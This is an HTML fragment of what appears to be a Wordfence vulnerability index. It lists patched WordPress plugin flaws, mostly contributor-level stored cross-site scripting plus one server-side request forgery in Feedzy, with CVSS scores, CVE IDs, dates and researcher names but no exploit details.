<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b9d66db-53a8-4d93-9222-6f9649a7d842" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/181ad412-2c16-4866-b477-7ce65996adb9" target="_blank" rel="noopener">Feedzy &lt;= 5.2.4 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66437" target="_blank" rel="noopener noreferrer">							CVE-2026-66437						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/feedzy-rss-feeds" target="_blank" rel="noopener">RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News &amp; YouTube Video Feeds Aggregator</a> <span class="wfvr-software-slug">[feedzy-rss-feeds]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/181ad412-2c16-4866-b477-7ce65996adb9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21718974-6229-42ee-be71-fbd14be190d2" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder &lt; 6.2.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11881" target="_blank" rel="noopener noreferrer">							CVE-2026-11881						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21718974-6229-42ee-be71-fbd14be190d2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b4d2561-34aa-493e-9dc7-50406dd7f9a4" target="_blank" rel="noopener">Gallery PhotoBlocks &lt;= 1.3.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66448" target="_blank" rel="noopener noreferrer">							CVE-2026-66448						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photoblocks-grid-gallery" target="_blank" rel="noopener">Gallery PhotoBlocks</a> <span class="wfvr-software-slug">[photoblocks-grid-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhammad-sharief" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/553cb97e15a106a04fa7e72b813e84b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="553cb97e15a106a04fa7e72b813e84b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhammad-sharief" target="_blank" rel="noopener">Muhammad Sharief</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b4d2561-34aa-493e-9dc7-50406dd7f9a4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f257a9-d447-407c-83ae-3cc99254be3f" target="_blank" rel="noopener">GamiPress &lt;= 7.9.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;gamipress_rank&#8217; Shortcode</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16091" target="_blank" rel="noopener noreferrer">							CVE-2026-16091						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f257a9-d447-407c-83ae-3cc99254be3f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dedd24e6-ac0c-48cd-a76a-8fb61d2c3c0f" target="_blank" rel="noopener">GamiPress &lt;= 7.9.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;heading_size&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15730" target="_blank" rel="noopener noreferrer">							CVE-2026-15730						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dedd24e6-ac0c-48cd-a76a-8fb61d2c3c0f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77727d02-796b-4c5b-ad5d-d1c366760abc" target="_blank" rel="noopener">GamiPress &lt;= 7.9.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via gamipress_achievement Shortcode</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16090" target="_blank" rel="noopener noreferrer">							CVE-2026-16090						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77727d02-796b-4c5b-ad5d-d1c366760abc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/402e10b4-84f0-4f93-a85c-037876d26e58" target="_blank" rel="noopener">GenerateBlocks &lt;= 2.3.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Dynamic Tag Injection in HTML Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13458" target="_blank" rel="noopener noreferrer">							CVE-2026-13458						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/generateblocks" target="_blank" rel="noopener">GenerateBlocks</a> <span class="wfvr-software-slug">[generateblocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/or-benit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/21d84c9bfb9b111185328d94d86b38d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21d84c9bfb9b111185328d94d86b38d5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/or-benit" target="_blank" rel="noopener">Or Benit</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/402e10b4-84f0-4f93-a85c-037876d26e58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/463fea25-c793-42fc-a8a8-28d001978133" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform &lt; 4.16.3 &#8211; Authenticated (Custom role+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14318" target="_blank" rel="noopener noreferrer">							CVE-2026-14318						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/463fea25-c793-42fc-a8a8-28d001978133" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f346cc7-92ad-4f76-a71c-864c22ed56b5" target="_blank" rel="noopener">Kadence Blocks &lt;= 3.7.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;toggleIcon&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18435" target="_blank" rel="noopener noreferrer">							CVE-2026-18435						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</a> <span class="wfvr-software-slug">[kadence-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f346cc7-92ad-4f76-a71c-864c22ed56b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/620bd934-327e-4509-a5e0-b910654af29b" target="_blank" rel="noopener">Kadence Blocks &lt;= 3.7.8.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Identity Block Inner Image Content</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18062" target="_blank" rel="noopener noreferrer">							CVE-2026-18062						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</a> <span class="wfvr-software-slug">[kadence-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/620bd934-327e-4509-a5e0-b910654af29b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fd6469c-bf36-4a46-a899-8d5163df8935" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes &lt;= 10.0.9 &#8211; Authenticated (Custom role+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14207" target="_blank" rel="noopener noreferrer">							CVE-2026-14207						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes</a> <span class="wfvr-software-slug">[lifterlms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3fd6469c-bf36-4a46-a899-8d5163df8935" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5545aab7-da77-4404-90e8-7b3e413769b5" target="_blank" rel="noopener">Location Weather &lt;= 3.0.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66433" target="_blank" rel="noopener noreferrer">							CVE-2026-66433						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/location-weather" target="_blank" rel="noopener">Location Weather – WordPress Weather Forecast, Air Quality &amp; Weather Widget</a> <span class="wfvr-software-slug">[location-weather]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5545aab7-da77-4404-90e8-7b3e413769b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/277b8437-a215-445c-8257-b0ca3f36336d" target="_blank" rel="noopener">MailOptin – Popup, Optin Forms &amp; Email Newsletters for Mailchimp, HubSpot, AWeber Etc. &lt;= 1.2.78.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66703" target="_blank" rel="noopener noreferrer">							CVE-2026-66703						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailoptin" target="_blank" rel="noopener">MailOptin – Popup, Optin Forms &amp; Email Newsletters for Mailchimp, HubSpot, AWeber Etc.</a> <span class="wfvr-software-slug">[mailoptin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/277b8437-a215-445c-8257-b0ca3f36336d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ca8ab94-45b8-4705-b23b-dbc743572121" target="_blank" rel="noopener">Newsletters &lt;= 4.15 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;link&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12939" target="_blank" rel="noopener noreferrer">							CVE-2026-12939						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
